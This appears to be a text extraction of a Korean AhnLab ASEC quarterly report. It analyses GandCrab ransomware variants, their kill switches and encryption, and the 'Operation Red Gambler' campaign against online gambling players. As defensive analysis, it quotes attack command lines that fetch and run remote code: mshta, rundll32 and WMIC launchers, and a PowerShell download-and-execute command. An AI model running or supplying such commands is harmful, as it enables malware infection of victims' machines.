ASEC REPORT VOL 년 2 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안

Size: px
Start display at page:

Download "ASEC REPORT VOL 년 2 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안"

Transcription

1

2 ASEC REPORT VOL 년 2 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성하며, 주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 더많은정보는안랩닷컴 (www. ahnlab.com) 에서확인하실수있습니다 년 2 분기보안동향 Table of Contents 보안이슈 SECURITY ISSUE 변종별특징부터킬스위치까지, 갠드크랩 랜섬웨어의모든것 04 악성코드상세분석 ANALYSIS-IN-DEPTH 오퍼레이션레드갬블러 의실체 21 ASEC REPORT Vol.91 Security Trend 2

3 보안이슈 SECURITY ISSUE 변종별특징부터킬스위치까지, 갠드크랩랜섬웨어의모든것

4 변종별특징부터 보안이슈 Security Issue 킬스위치까지, 갠드크랩 랜섬웨어의모든것 올해초취약한웹사이트를통해유포되기시작한갠드크랩 (GandCrab) 랜섬웨어가 2018년 2분기에들어선지난 4월초부터는다양한변종형태로잇따라등장하며국내에본격적으로확산되기시작했다. 특히단일실행파일로동작하는형태뿐만아니라, 파일로생성되지않고메모리상에서만동작하여암호화를진행하도록하는파일리스 (Fileless) 형태의등장이뜨거운감자로떠올랐다. 안랩시큐리티대응센터 (AhnLab Security Emergency-response Center, 이하 ASEC) 는갠드크랩랜섬웨어와그변종을지속적으로추적, 분석했다. 그결과, 갠드크랩랜섬웨어의킬스위치 (Kill Switch) 를찾아내자사고객의피해예방을위한대응방안을배포할수있었다. 이리포트에서는갠드크랩랜섬웨어의버전별형태, 감염방식등주요특징과킬스위치 (Kill Switch) 까지면밀히살펴본다. 01. 유포방식 갠드크립랜섬웨어의유포방식은크게파일리스 (Fileless) 형태의유포와실행파일형태의유포두 가지로나눌수있다. (1) 파일리스 (FILELESS) 형태의유포 파일리스형태로유포된갠드크랩랜섬웨어는갠드크랩 v2.1, 갠드크랩 v2.1( 내부버전 version=3.0.0), 갠드크랩 v3.0 으로구분할수있다. 각버전별갠드크랩의특징을살펴보자. ASEC REPORT Vol.91 Security Trend 4

5 1-1) 갠드크랩 v2.1 지난 4월초, 파일형태로생성되지않고오직메모리상에서만동작하는갠드크랩 v2.1가최초로발견되었다. 이와같은형태의갠드크랩랜섬웨어는매그니튜드 (Magnitude) 익스플로잇킷을통해유포되었으며, 동작방식은 [ 그림 1-1] 과같다. 그림 1-1 갠드크랩 v2.1 유포및동작방식 사용자가유포사이트에접근시, 공격자가의도한윈도우정상프로세스인 mshta.exe, rundll32. exe, WMIC.exe 를통해특정 URL로접속을유도한다. 해당정상프로세스를통해접속하는페이지에는악성자바스크립트가포함되어있다. 각프로세스별스크립트실행방식은 [ 표 1-1], [ 표 1-2], [ 표 1-3] 과같다. mshta.exe 로구동되는커맨드명령 GetObject("new: C279-11CE-A49E ").ShellExecute "mshta","vbscript:close(execute("getobject("script:"url")))" 표 1-1 mshta.exe 로구동되는커맨드명령 rundll32.exe 로구동되는커맨드명령 GetObject("new: C279-11CE-A49E ").ShellExecute "Rundll32.exe",\"javascript:"\\..\\mshtml,RunHTMLApplication \"&\"&\";document.write();getobject('script:url')\" 표 1-2 rundll32.exe 로구동되는커맨드명령 ASEC REPORT Vol.91 Security Trend 5

6 WMI 로구동되는커맨드명령 GetObject("new:72C24DD5-D70A-438B-8A B88AFB8").Run "wmic process call create "'"mshta vbscript:close(execute("""getobject (""""script:"url""")"""))"' 표 1-3 WMI 로구동되는커맨드명령 접속 URL 페이지에작성되어있는악성스크립트가실행되면코드내부에 Base64로인코딩된 DLL 이미지를디코딩하여메모리상에서동작하도록한다. 디코딩된 DLL 이미지는내부에갠드크랩 v2.1의핵심이되는또다른 DLL 이미지를 explorer.exe에인젝션하여동작하도록한다. 파일리스형태의갠드크랩은이와같이악성행위과정에서자바스크립트및 PE 이미지를파일로드롭하거나다운로드하지않은채메모리상에서만동작하게하는것이특징이다. 킬스위치 1: 갠드크랩 v2.1 암호화방지 안랩분석결과, 특정조건에서갠드크랩 v2.1 의파일암호화가중단될수있게하는킬스위치 (Kill-Switch) 를확인하였다. Text.txt 파일내부에 10바이트의특정데이터가존재할경우, 해당파일이하경로는암호화하지않는다. 즉, 특정데이터를포함한 Text.txt 파일을각드라이브루트경로에복사해놓으면해당드라이브하위의파일들에대한암호화를막을수있게된다. 다음은특정드라이브하위의파일에대한암호화차단예시이며, [ 그림 1-2] 는 Text.txt 파일의내부데이터값이다. C:\Text.txt (C 드라이브하위암호화차단 ) D:\Text.txt (D 드라이브하위암호화차단 ) 그림 1-2 암호화를차단할수있는 Text.txt 내부데이터값 ASEC REPORT Vol.91 Security Trend 6

7 1-2) 갠드크랩 v2.1 ( 내부버전 version=3.0.0) 이번에살펴볼갠드크랩은앞서확인한갠드크랩 v2.1과표면적으로동일하나, 파일암호화후나타나는랜섬노트에표기된버전과실질적인암호화기능을수행하는 DLL 파일내에하드코딩된버전이다르다는점이특징적인점이다. 분석결과랜섬노트에는 GandCrab v2.1 로나오지만, [ 그림 1-3] 과같이실제로공격자에게전달되는내부버전정보는 인것으로확인되었다. 비슷한시기에접수된또다른갠드크랩역시랜섬노트에서는 GandCrab v2.1 로표기되었지만내부버전정보는 으로확인되었다. 해당데이터는암호화 PC의고유 ID, 암호화키등의값과함께공격자에게 HTTP 통신파라미터로전달된다. 내부버전 3.0.0으로명시된 DLL 파일은바이너리빌드날짜가 2018년 4월 23일 (UTC) 로, 랜섬웨어공격자는최근까지도악성코드를제작및유포하고있다는점을알 수있다. 그림 1-3 내부버전을따로명시하는 GandCrab 킬스위치 2: 갠드크랩 v2.1( 내부버전 version=3.0.0) 암호화방지 갠드크랩 v2.1( 내부버전 version=3.0.0) 또한마찬가지로특정조건에서파일암호화가중단될수 있는킬스위치를 (Kill-Switch) 가확인됐다. 갠드크랩 v2.1 실행시시스템 C:\ 경로내에 MalwarebytesLABs 이름을가진파일또는 폴더가있을경우 [ 그림 1-4] 와같은메시지창 그림 1-4 갠드크랩실행시확인되는메시지창 이나타난다. 이때악성프로세스는 [ 확인 ] 버튼 ASEC REPORT Vol.91 Security Trend 7

8 에대한사용자의마우스클릭동작 ( 이벤트 ) 을대기하기때문에암호화단계로넘어가는것을일시적으로멈추게된다. 따라서 [ 그림 1-4] 와같은메시지창이발생했을경우에는 [ 확인 ] 버튼을클릭하거나창을닫지말아야하며, 즉시시스템을종료하면암호화가되는것을방지할수있다. 메시지창은 C:\MalwarebytesLABs 파일또는폴더가존재하는경우에만발생하므로, 다음과같이두가지방식의예방법을소개한다. Case 1) C:\ 경로에 MalwarebytesLABs 이 름을가진폴더를생성한다. Case 2) C:\ 경로에 MalwarebytesLABs 이 름 ( 확장자없음 ) 을가진파일을생성한다. 그림 1-5 C 드라이브최상위경로에 MalwarebytesLABs 폴더생성 1-3) 갠드크랩 v3.0 갠드크랩 v2.0 이후지난 4 월말부터 5 월초에거쳐파일리스형태의갠드크랩 v3.0 이잇따라등 장하였는데, 갠드크랩 v3.0 의경우동작방식에서이전버전인 v2.0 과는상당한차이를보였다. 그림 월 30 일유포과정구조도 ASEC REPORT Vol.91 Security Trend 8

9 그림 월 2 일유포과정구조도 [ 그림 1-6] 과 [ 그림 1-7] 는각각 4 월 30 일과 5 월 2 일매그니튜드 (Magnitude) 익스플로잇킷을통 해유포된갠드크랩 v3.0 의구조도이다. 유포된스크립트로부터갠드크랩 v3.0 랜섬웨어가실행되 기까지의상세과정은다음과같다. 그림 1-8 인코딩된유포스크립트 먼저유포스크립트를살펴보면 [ 그림 1-8] 과같이매그니튜드익스플로잇킷의랜딩페이지로인코딩된형태임을알수있다. 이후해당유포스크립트는 4월 30일, 5월 2일각각 [ 그림 1-9], 그림 1-9 디코딩된유포스크립트 (04/30) [ 그림 1-10] 과같은형태로다시디코딩된다. ASEC REPORT Vol.91 Security Trend 9

10 그림 1-10 디코딩된유포스크립트 (05/02) [ 그림1-9], [ 그림1-10] 의유포스크립트는빨간박스로표시된변수 array에담긴문자열 (Base64 로인코딩된닷넷 DLL) 을디코딩한후실행한다. 해당방식은디코딩된닷넷 DLL을로컬에드랍하지않고실행하는파일리스방식이다. 따라서닷넷 DLL은해당유포스크립트가동작하고있던 iexplore.exe 의메모리상에서동작하게된다. 그림 1-11 Base64 디코딩된닷넷 PE (04/30) 그림 1-12 Base64 디코딩된닷넷 PE (05/02) ASEC REPORT Vol.91 Security Trend 10

11 [ 그림 1-11] 와 [ 그림 1-12] 은각각 4월 30일, 5월 2일유포스크립트내부의닷넷 DLL 코드다. 유포스크립트로인해해당 DLL이실행되면 [ 그림 1-9], [ 그림 1-10] 에보이는변수 array에담긴쉘코드를쓰레드로실행시킨다. 해당쉘코드는앞서확인한 [ 그림 1-6], [ 그림 1-7] 의구조도에서보이는패킹된 DLL을다운로드하고실행하는역할을수행한다. 그림 1-13 쉘코드로부터다운로드되는 DLL (04/30) 그림 1-14 쉘코드로부터다운로드되는 DLL (05/02) [ 그림 1-13] 과 [ 그림 1-14] 는각각 4월 30일, 5월 2일쉘코드로부터다운로드및실행되는 DLL이다. 날짜별실행방식의차이점은인젝션대상프로세스이다. [ 그림 1-13] 의 4월 30일자 DLL의경우 svchost.exe에인젝션을시도하며, 실패시현재프로세스 (iexplore.exe) 에랜섬웨어를인젝션한다. 한편 [ 그림 1-14] 의 5월 2일자 DLL의경우 wimserv.exe 에인젝션을시도하며, 실패시현재프로세스 (iexplore.exe) 에랜섬웨어를인젝션하게된다. ASEC REPORT Vol.91 Security Trend 11

12 (2) 실행파일형태의유포 실행파일형태로유포된갠드크랩랜섬웨어는크게지원서및정상유틸리티프로그램으로위장 한갠드크랩 v2.0 과스팸메일을통해이력서로위장한갠드크랩 v3.0 으로구분할수있다. 2-1) 지원서및정상유틸리티프로그램으로위장 ( 갠드크랩 v2.0) 안랩에서수집한갠드크랩랜섬웨어를분석한결과, 갠드크랩 v2.0 은 [ 표 1-4] 와같이수집된경 로, 파일명등을지원서및정상유틸리티프로그램으로위장하여유포되고있음을확인하였다. 유포경로 지원서위장 (license.exe) skype 위장 (skype.exe) kakaotalk 위장 (kakatotalk.exe)..\ 행정업무 \ 프리랜서 _ 계약비용 \ 지원 \ 이영윤 \ 지원서 \ 지원서 \license.exe..\documents\ 지원서 \ 지원서 \license.exe..\desktop\ 이영윤 \ 지원서 \ 지원서 \license.exe..\pictures\ 이미지링크정리 \ 이미지링크정리 \skype.exe..\documents\ 이미지링크정리 \ 이미지링크정리 \skype.exe..\documents \ 이미지링크정리 \ 이미지링크정리 \kakaotalk.exe..\desktop\ 전단지 \ 이미지링크정리 \ 이미지링크정리 \kakaotalk.exe 표 1-4 갠드크랩 v2.0 유포경로 유포경로로볼때갠드크랩 v2.0 은국내에활발히유포되고있으며, 유포시압축파일로전파되 었을것으로보인다. [ 표 1-4] 의현재까지확인된갠드크랩 v2.0 배포에악용된 3 가지이름의파일 은실행하지않도록주의해야한다. 2-2) 스팸메일을통해이력서로위장 ( 갠드크랩 v3.0) 지난 5월초에는사회공학기법을이용해채용정보사이트에정보를기재한인사담당자를대상으로이력서형태의갠드크랩 v3.0 랜섬웨어가집중유포됐다. 공격자는입사지원자를사칭한메일을통해인사담당자가메일본문에포함된링크를클릭시랜섬웨어다운로드페이지로이동하도록연결을유도한다. 사용자가해당페이지에서이력서로위장한압축파일을다운로드하여실행하면갠드크랩랜섬웨어에감염된다. 유포과정은 [ 그림 1-15] 와같다. ASEC REPORT Vol.91 Security Trend 12

13 그림 1-15 이력서로위장한갠드크랩유포과정 공격자는 [ 그림 1-16] 과같이이력서메일에소개글과함께 이력서를첨부하였습니다 라는내용으 로링크클릭을유도하는데, 이서버 ( 에접속하면지원자명의로된압축 파일이다운로드된다. 그림 1-16 지원메일 이압축파일 (min_hee_resume.zip) 을해제하면 [ 그림 1-17] 과같은스크립트파일 (resume. js) 이존재하는데, 해당스크립트는난독화되어있어 [ 그림 1-18] 과같이알아볼수없는문자열 로보인다. 그림 1-17 압축파일 ASEC REPORT Vol.91 Security Trend 13

14 그림 1-18 난독화된스크립트 해당스크립트를복호화하면 [ 그림 1-19] 와같이랜섬웨어유포페이지 URL( update.php) 등을확인할수있으며, 서버로부터랜섬웨어 ( 랜덤 _ 이름 ).exe 파일을다운로드한후 실행하는기능이존재하는것을알수있다. 그림 1-19 복호화후 URL 스트링 02. 감염동작방식및암호화방식 (1) 감염동작방식앞서살펴본갠드크랩랜섬웨어의버전을정리하면크게 v2.0, v2.1, v3.0 세가지로정리할수있으며, 각버전별로암호화대상혹은제외대상등암호화조건들이점차적으로변화했다. [ 표 1-5] 는갠드크랩랜섬웨어의버전별공통점과차이점이다. ASEC REPORT Vol.91 Security Trend 14

15 v2.0 v2.1 v3.0 C&C로전송되는사용자정보동일 - 공용 IP, PC_USER, PC_NAME, PC_GROUP, 언어, OS version, OS bit, 식별자, 저장장치정보 공통점 랜섬노트명 (CRAB-DECRYPT.txt) 및 정상파일암호화후변경되는확장자 (CRAB) 명 암호화제외경로및파일명 [ 표 6] 차이점.ani,.cab,.cpl,.cur,.diagcab,.diagpkg,.dll,.drv,.hlp,.icl,.icns,.ico,.ics,.lnk,.key,.idx,.mod,.mpa,.msc,.msp,.msstyles,.msu,.nomedia,.ocx,.prf,.rom,.rtp,.scr,.shs,.spl,.sys,.theme,.themepack,.exe,.bat,.cmd,.CRAB,.crab,.GDCB,.gdcb,.gandcrab,.yassine_lemmou (42개) 종료대상프로세스 [ 표7] 사용중인 AntiVirus 제품확인목록 [ 표8] 암호화방식 ( 아래상세설명 ) 암호화제외확장자 v2.0에서.ldf 하나추가 (43개) v3.0v2.1과동일 (43개) 랜섬노트에각각의버전명시바탕화면변경기능 표 1-5 갠드크랩의버전별공통점및차이점 바탕화면변경없음 v2.1 바탕화면변경없음 v 바탕화면변경함 [ 그림 20]3.0 또한 [ 표 1-6] 과같이일부경로와파일명은암호화대상에서제외된다. 암호화제외경로 암호화제외파일명 \ProgramData\ Ransomware desktop.ini boot.ini \IETldCache\ \All Users\ autorun.inf ntuser.dat.log \Boot\ \Local Settings\ ntuser.dat thumbs.db \Program Files\ \Windows\ iconcache.db CRAB-DECRYPT.txt \Tor Browser\ bootsect.bak 표 1-6 암호화제외경로및파일명 갠드크랩랜섬웨어가종료시키는대상프로세스는 [ 표 1-7] 과같다. ASEC REPORT Vol.91 Security Trend 15

16 암호화제외경로 msftesql.exe xfssvccon.exe ocomm.exe onenote.exe sqlagent.exe mydesktopservice.exe mysqld.exe outlook.exe sqlbrowser.exe agntsvc.exeisqlplussvc.exe mysqld-nt.exe powerpnt.exe sqlservr.exe xfssvccon.exe mysqld-opt.exe steam.exe sqlwriter.exe mydesktopservice.exe dbeng50.exe thebat.exe oracle.exe ocautoupds.exe sqbcoreservice.exe thebat64.exe ocssd.exe agntsvc.exeagntsvc.exe excel.exe thunderbird.exe dbsnmp.exe agntsvc.exeencsvc.exe infopath.exe visio.exe synctime.exe firefoxconfig.exe msaccess.exe winword.exe mydesktopqos.exe tbirdconfig.exe mspub.exe wordpad.exe agntsvc.exeisqlplussvc.exe 표 1-7 종료대상프로세스 또한갠드크랩랜섬웨어는현재사용자가시스템에서사용중인백신프로그램에대해서도확인하 는데대상제품은 [ 표 1-8] 과같다. 사용중인 AntiVirus 제품확인목록 AVP.EXE ekrn.exe avgnt.exe ashdisp.exe NortonAntiBot.exe 표 1-8 사용자가사용중인백신제품확인대상 Mcshield.exe avengine.exe cmdagent.exe smc.exe persfw.exe pccpfw.exe fsguiexe.exe cfp.exe msmpeng.exe 최종적으로사용자시스템이갠드크랩랜섬웨어에감염되면바탕화면이변경된다. [ 그림 1-20] 은 갠드크립 v3.0 에감염된화면이다. 그림 1-20 갠드크랩 v3.0 에감염된후변경된바탕화면 ASEC REPORT Vol.91 Security Trend 16

17 (2) 암호화방식 앞서 [ 표 1-5] 의갠드크랩랜섬웨어의버전별특징에서확인한것과같이갠드크랩은정상파일을 암호화할때공통적인방식을사용하며, 상세내용은다음과같다. 갠드크랩랜섬웨어는 v2.0 이후부터공개키기반의암호화방식을사용한다. 암호화대상이되는파일마다랜덤한키바이트를생성하여 AES-256 방식으로암호화한뒤, 랜덤키바이트를다시공격자의공개키로암호화한다. 따라서암호화된파일을복호화를하기위해서는공격자의개인키가필요하다. 그림 1-21 갠드크랩 v2.1 의암호화방식 [ 그림 1-21] 는갠드크랩 v2.1의암호화방식을요약한구조도이다. 먼저로컬에서공개키 / 개인키쌍을생성한뒤공격자의 C&C 서버에생성한키값을전송한다. 이후공격자는자신의공개키를감염 PC에전송하여사용자로컬 PC에서생성한랜덤한키값을암호화하는데활용한다. 따라서공격자의 C&C 서버에서전달받은공개키에대한개인키를알지못하면암호화된파일의복구는불가능하다. ASEC REPORT Vol.91 Security Trend 17

18 그림 1-22 암호화된파일의구조 갠드크랩 v2.1에의해암호화가완료된파일은내부구조가변경되는데, [ 그림 1-22] 은원본의파일크기가 0x220인파일을암호화한결과이다. 파일끝 0x208 크기의값은복호화에필요한값들을저장하고있다. 공격자의공개키로키값과벡터값을암호화하기때문에복호화를위해서는공격자의개인키가필요하다. 03. 안랩제품의대응현황 V3 제품군에서는갠드크랩랜섬웨어의최신변종을다음과같은진단명으로탐지하고있다. 파일리스 (Fileless) 형태의갠드크랩 진단명 네트워크침입차단 행위진단 malware_gandcrab_c2_init-1(http) Malware/MDP.Ransom.M1928 Malware/MDP.Create.M1925 ASEC REPORT Vol.91 Security Trend 18

19 실행파일형태의갠드크랩 진단명 네트워크침입차단 malware_gandcrab_c2_init-1(http) Malware/MDP.Ransom.M1171 행위진단 Malware/MDP.Create.M1179 Malware/MDP.Ransom.M1907 Trojan/Win32.RansomCrypt 파일진단 Trojan/Win32.Gandcrab Win-Trojan/Gandcrab.Exp ASEC REPORT Vol.91 Security Trend 19

20 악성코드 상세분석 ANALYSIS-IN-DEPTH 오퍼레이션레드갬블러 의실체

21 악성코드상세분석 Analysis-In-Depth 오퍼레이션 레드갬블러 의실체 안랩은국내기관및주요기업들을대상으로지속적인사이버공격을수행했던다수의해킹그룹들을추적하던중지난 2016년 10월부터 2017년 8월까지약 11개월동안특정공격그룹이국내고스톱 포커류의사행성게임이용자들을노린악성코드를제작및유포했음을확인했다. 이는기밀정보유출등을목적으로한이전공격과는달리경제적이익을목적으로개인사용자까지공격을확대했다는점에서주목할필요가있다. 안랩시큐리티대응센터 (ASEC) 는공격에사용된악성코드의동작방식과목적등을분석하여해당공격을 오퍼레이션레드갬블러 (Operation Red Gambler) 로명명했다. 이리포트에서는해당그룹의최근공격동향과함께악성코드유포방식, 공격대상의변화등상세한분석내용을살펴본다. 01. 오퍼레이션레드갬블러 (Operation Red Gambler) 공격동향 2009년 7월 DDoS 공격을시작으로현재까지국내를대상으로한사이버공격은특정국가와관련된것으로추정되는데, 이들해킹그룹은주로정치적, 경제적목적을위해전세계를대상으로다양한공격을수행해왔다. 그중언론보도사례기준국내를대상으로수행한주요공격동향을정리하면 [ 그림 2-1] 과같다. ASEC REPORT Vol.91 Security Trend 21

22 그림 2-1 국내를대상으로수행한주요공격타임라인 초기에는주로시스템파괴를통한사회혼란야기, 기밀자료탈취등의목적이대부분이었으나, 2016년하반기부터는경제적이익에좀더무게를둔악성코드를제작및유포했던것으로보인다. 안랩시큐리티대응센터 (ASEC) 는다수의해킹그룹의움직임을추적하던중한공격그룹이지난 2016년 10월부터 2017년 8월까지약 11개월동안국내고스톱 포커류의사행성웹보드게임이용자의정보를탈취하는악성코드를제작및유포했음을확인했다. 편의상, 이보고서에서는해당공격그룹을 A 공격그룹으로지칭한다. (1) 공격개요고스톱 포커류의사행성웹보드게임은이용자들이보유한게임머니를걸고승부를가리는게임으로승리자는패배자의게임머니를얻을수있다. 게임을통해벌어들인게임머니는불법환전상등다양한경로를통해현금으로바꿀수있기때문에오래전부터사기도박조직 그림 2-2 사행성게임화면 의공격대상이되어왔다. ASEC REPORT Vol.91 Security Trend 22

23 이와같은사행성게임을목적으로하는사기도 박조직은 [ 그림 2-3] 과같이총책, 관리자, 사 기도박자, 악성코드개발자로구성된다. 총책 (Organizer) 사기도박조직의총책임자이며, 악성코드제작자에게통칭 뷰어또는돋보기 라불리는프로그램의제작을의뢰한다. 직접범행사무실을관리하거나, 범행사무실을관리하는다른하위 조직에구매한악성코드를재판매한다. 그림 2-3 사기도박조직구성도 악성코드개발자 (Malware Creator) 총책으로부터의뢰를받아사기도박을위한프로그램을개발및유포하고구매대금을받는다. 사기도박을위한프로그램은다양한개발언어 Dephi, C++, MFC 등으로제작되며범죄조직내에서암암리에소스코드를판매하는것으로추정된다. 뷰어 ( 돋보기 ) 프로그램 (Viewer) 뷰어 ( 돋보기 ) 프로그램은게임화면및시스템정보를수집하여중계서버에실시간으로전송하는악성코드이다. 게임이용자가많은 PC방시스템및불특정다수를상대로악성코드를유포하며, 이들중사행성온라인게임이용자를범행대상으로노린다. 프로세스실시간감시및화면정보전송, 보안제품의탐지회피, 시스템의순간복구프로그램을무력화하는기능등이있다. 관리자 (Manager) 총책으로부터악성코드를구매하며, 작업장 이라불리는범행사무실을관리하는하위조직이다. ASEC REPORT Vol.91 Security Trend 23

24 범죄조직에따라관리자가악성코드유포를담당하는경우가있다. 그림 2-4 뷰어 ( 돋보기 ) 사용중인사기도박자 사기도박자 (Grifter) 범행사무실에는일명 선수 라불리는사기도박자가수집된게임정보를이용하여사기도박을벌인다. 사기도박자는악성코드를통해수집된정보를관리프로그램으로확인할수있다. 이렇게획득한정보를이용하여상대방의패를훔쳐보며사기도박을벌인다. 사기도박을통해벌어들인게임머니는불법환전상등다양한경로를통해현금화하여부당이득을챙긴다. (2) 공격대상 오퍼레이션레드갬블러의주요공격대상은국내고스톱 포커류의사행성게임이용자로공격그 룹은경제적이익을목적으로사용자들의게임정보를탈취하는악성코드를유포했다. 국내사행성게임시장의경우국내메이저게임사와그이외의마이너게임사들이고스톱 포커류 의사행성웹보드게임을운영하고있다. 한편, 규제를피해게임물관리위원회에등록되지않은불 법고스톱 포커류의사행성게임도존재한다. ASEC REPORT Vol.91 Security Trend 24

25 [ 표 2-1] 은공격대상게임목록이며, 공격그룹은주기적으로공격대상게임목록을업데이트한다. 게임운영사 게임이름 A사 7포커, 라스베가스포커, 로우바둑이, 하이로우, 텍사스홀덤 B사 7포커, 뉴포커, 훌라, 로우바둑이, 하이로우 C사 포커 D사 포커 E사 포커 F사 포커, 맞고 G사 포커, 맞고 H사 포커, 맞고 표 2-1 공격대상게임목록 국내에유통되는게임물은먼저게임물관리위원회의등급분류를받아야하는데, 게임물관리위원회에등록된사행성게임은규제에의해베팅및이용한도와불법환전이제한되어있어일부마이너게임사에의해제작된사행성게임의경우정상등급분류를받고난뒤게임내용을변경하는편법을사용한다. 이후변조된게 임내용이적발되어등록이취소되면일정기간이지난후상표를바꿔다시운영한다. 이와같이주기적으로상표가변경되는국내고스톱 포커류의사행성게임시장의특성으로인해 공격그룹또한주기적으로공격대상게임을업데이트하는것으로추정된다. (3) 타임라인사기도박조직의전통적인공격전술은고스톱 포커류의사행성게임이용자가많은 PC방을대상으로악성코드를유포하는것이다. 하지만 A 공격그룹의최초공격방법을분석한결과기존사기도박조직의공격방식과차이점이있음을확인했다. [ 그림 2-5] 의공격타임라인을살펴보자. 그림 2-5 공격타임라인 ASEC REPORT Vol.91 Security Trend 25

26 A 공격그룹이제작한악성코드는 2016 년 10 월최초로발견되었는데, 최초공격대상은유틸리티프로 그램을이용하는불특정다수의사용자였다. 그리고같은해 12 월까지유틸리티프로그램의공식웹사 이트를통해악성코드를유포하였으며, 각공격은유틸리티프로그램에따라기간을두고진행되었다. 2017년 1월, A 그룹의공격이다시개시되었는데전년도와달리 PC방을새로운공격대상으로삼은것이확인되었다. 전년도불특정다수를대상으로한공격의효과가미비하였기때문에소수의관리서버를통해다수의클라이언트제어가가능한 PC방으로공격대상을변경한것으로추정되며, 해당공격은 2017년 8월까지계속되었다. [ 그림 2-6] 의유포시기별악성코드진단 PC 수통계를확인하면 2017 년 A 공격그룹이공격 대상을 PC 방으로변경함에따라진단 PC 수가 급증하였음을알수있다. 그림 2-6 유포시기별진단 PC 수통계 (4) 공격방식 A 공격그룹은효과적인공격을위해유틸리티소프트웨어설치파일변조하거나 PC 방관리프로 그램을조작하는형태로악성코드를유포했다. 1) 유틸리티소프트웨어설치파일변조유틸리티소프트웨어를통한공격활동은 2016년 10월부터발견되었으며, 공격의진원지는유틸리티소프트웨어의공식홈페이지로확인되었다. A 공격그룹은다운로드게시판에업로드된설치파일또는다운로드링크를변조하는공격방식을이용했다. ASEC REPORT Vol.91 Security Trend 26

27 일자프로그램명프로그램분류진단명 **** 러브 (****love) 가상사설망 (VPN) 서비스 Dropper/Win32.Fakeinstaller ~ **** 피24(****24) 가상사설망 (VPN) 서비스 Dropper/Win32.Fakeinstaller ****(****OK) 원격제어프로그램 Dropper/Win32.Agent **** 세스 **** 시스템최적화프로그램 Dropper/Win32.Fakeinstaller **** 세스 **** 시스템최적화프로그램 Dropper/Win32.Fakeinstaller 표 차공격대상프로그램정보 공격그룹은가상사설망 (VPN) 서비스를제공하는프로그램부터원격제어프로그램, 시스템최적 화프로그램까지다양한종류의유틸리티소프트웨어를공격대상으로삼았으며, [ 그림 2-7] 과같은 유틸리티소프트웨어설치파일을이용한공격방법을이용하여불특정다수의사용자들을노렸다. 그림 2-7 유틸리티소프트웨어설치파일공격방법 또한공격대상을속이기위해악성코드와설치파일을결합하여변조된설치파일을만들었다. 이렇게변조된설치파일은두가지의방법으로유포되었다. 첫번째는공식홈페이지의정상설치파일을변조된설치파일로바꿔치기하는방법이며, 두번째는공식홈페이지의다운로드링크주소를변조된설치파일이업로드된공격자서버주소로변조하는방법이다. ASEC REPORT Vol.91 Security Trend 27

28 프로그램명정상다운로드링크주소변조된다운로드링크주소 (IP 주소 ) **** 피 24(****24) *****24.*****ware.co.kr *****.hopto.org (198.***.126.***) **** 세스 **** *****clean.*****tory.com *****clean.*****tory1.com (198.***.126.***) **** 세스 **** *****ping.*****tory.com *****ping.*****tory1.com (198.***.126.***) 표 2-3 변조된다운로드링크주소정보 이용자가프로그램을설치하기위해다운로드링크주소를클릭하면, 공격자서버로부터변조된설치파일이다운로드된다. A 공격그룹은공식홈페이지관리자와프로그램이용자의의심을피하고자다운로드링크주소를정상다운로드링크주소와유사한문자열로생성했다. 또한단일서버에다수의도메인이름 (Domain Name) 을등록하는방식으로서버를운영하였으며, 파일다운로드이외에다른목적으로서버에접속할경우에는공식홈페이지로리다이렉트되도록설정했다. HTTP Response <html><head> <title>302 Found</title> </head><body> <h1>found</h1> <p>the document has moved <a href=" <hr> <address>apache Server at <a href="mailto:admin@localhost">named.ddns.net</a> Port 80</address> </body></html> 표 2-4 *****clean.*****tory1.com 의응답정보 2) PC방관리프로그램을통한유포 PC방관리프로그램을통한공격방식은 2017 년상반기에확인되었다. A 공격그룹은 2016 년에시도한불특정다수이용자를대상으로한공격의효과가미비하자공격대상을 PC방이 그림 2-8 PC 방관리서버공격방법 용자로변경한것으로추정된다. ASEC REPORT Vol.91 Security Trend 28

29 A 공격그룹은 [ 그림 2-8] 과같이 PC 방의특성상소수의관리서버를통해다수의클라이언트가 통제되는구조를악용하여, PC 방업체의관리프로그램중일부를이용하여악성코드를유포했다. Command Line cmd.exe /c if not exist c:\users\administrator\appdata\local\temp\csrss.exe powershell (new-object system.net.webclient).downloadfile ( c:\users\administrator\appdata\local\temp\csrss.exe ); (new-object -com shell.application).shellexecute( c:\users\administrator\appdata\local\temp\csrss.exe ) 표 2-5 PC 방클라이언트에전송된명령어정보 공격이발생한 PC방을토대로유포경로를분석한결과, PC방클라이언트에 [ 표 2-5] 와같은명령어가실행된것이확인되었다. 해당명령어는명령프롬프트를실행하여윈도우파워쉘 (PowerShell) 을실행한다. 파워쉘은파일을남기지않는파일리스 (Fileless) 공격기법에주로사용되는데, 별도의파일을생성하지않고스크립트를동작시키면사용자몰래원하는경로에악성코드를다운로드및실행할수있다. 최초명령을실행한프로세스는찾을수없었으나, PC방내다수의클라이언트에동시에명령을내리기위해서는 PC방의운영솔루션이나관리프로그램을이용해야하므로 A 공격그룹은 PC방의운영솔루션또는관리프로그램서버에침투하여사전에제작된악성 URL에서악성코드를다운로드및실행하는명령을내린것으로추정된다. 02. 상세분석 A 공격그룹이공격에이용한악성코드는윈도우운영체제의사용자계정컨트롤 (User Account Control, UAC) 기능을우회하여관리자권한으로실행된다. ASEC REPORT Vol.91 Security Trend 29

